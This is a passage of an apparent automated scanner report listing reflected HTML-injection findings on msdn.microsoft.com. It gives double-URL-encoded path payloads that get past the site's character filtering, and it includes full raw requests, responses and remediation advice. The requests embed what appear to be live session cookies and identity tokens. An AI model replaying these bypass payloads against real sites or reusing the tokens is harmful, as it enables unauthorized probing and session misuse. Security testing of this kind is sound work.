Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9209
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:14:25 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms376734.aspxf5baf"><a>d814d454776" />
...[SNIP]...

2.111. http://msdn.microsoft.com/en-us/library/ms689718(VS.85 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(VS.85

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbad9%2522%253e%253ca%253e8df1c91ad96 was submitted in the REST URL parameter 1. This input was echoed as dbad9"><a>8df1c91ad96 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-usdbad9%2522%253e%253ca%253e8df1c91ad96/library/ms689718(VS.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:15:57 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-usdbad9"><a>8df1c91ad96/library/ms689718(VS.85" />
...[SNIP]...

2.112. http://msdn.microsoft.com/en-us/library/ms689718(VS.85 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(VS.85

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5dc98%2522%253e%253ca%253ea7defceea7f was submitted in the REST URL parameter 2. This input was echoed as 5dc98"><a>a7defceea7f in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library5dc98%2522%253e%253ca%253ea7defceea7f/ms689718(VS.85 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9212
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:06 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library5dc98"><a>a7defceea7f/ms689718(VS.85" />
...[SNIP]...

2.113. http://msdn.microsoft.com/en-us/library/ms689718(VS.85 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(VS.85

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 597f0%2522%253e%253ca%253e4ee946ae8f7 was submitted in the REST URL parameter 3. This input was echoed as 597f0"><a>4ee946ae8f7 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/library/ms689718(VS.85597f0%2522%253e%253ca%253e4ee946ae8f7 HTTP/1.1
Host: msdn.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 9211
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:16:12 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/ms689718(VS.85597f0"><a>4ee946ae8f7" />
...[SNIP]...

2.114. http://msdn.microsoft.com/en-us/library/ms689718(VS.85).aspx [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(VS.85).aspx

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87014%2522%253e%253ca%253e61c23bd9200 was submitted in the REST URL parameter 1. This input was echoed as 87014"><a>61c23bd9200 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us87014%2522%253e%253ca%253e61c23bd9200/library/ms689718(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 17:55:40 GMT
Content-Length: 9188

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met
...[SNIP]...
<input type="hidden" name="fromPage" value="http://msdn.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us87014"><a>61c23bd9200/library/ms689718(VS.85)" />
...[SNIP]...

2.115. http://msdn.microsoft.com/en-us/library/ms689718(VS.85).aspx [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://msdn.microsoft.com
Path:   /en-us/library/ms689718(VS.85).aspx

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbb0d%2522%253e%253ca%253e61e6c453a14 was submitted in the REST URL parameter 2. This input was echoed as cbb0d"><a>61e6c453a14 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /en-us/librarycbb0d%2522%253e%253ca%253e61e6c453a14/ms689718(VS.85).aspx HTTP/1.1
Host: msdn.microsoft.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MUID=34AD5BBBF6FC477CAC5139C76AA247F9; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; mcI=Sat, 06 Nov 2010 18:51:25 GMT; ixpLightBrowser=1; viewkey=loband; __qca=P0-1185849018-1290642834531; __unam=289c965-12c804ebf38-f510776-6; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.NumberOfVisits=3&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:26:48&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=3&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; MS0=e6b8850fc3b54b87b9cd070b16412ced; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8N00023AU0402g3AU04

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
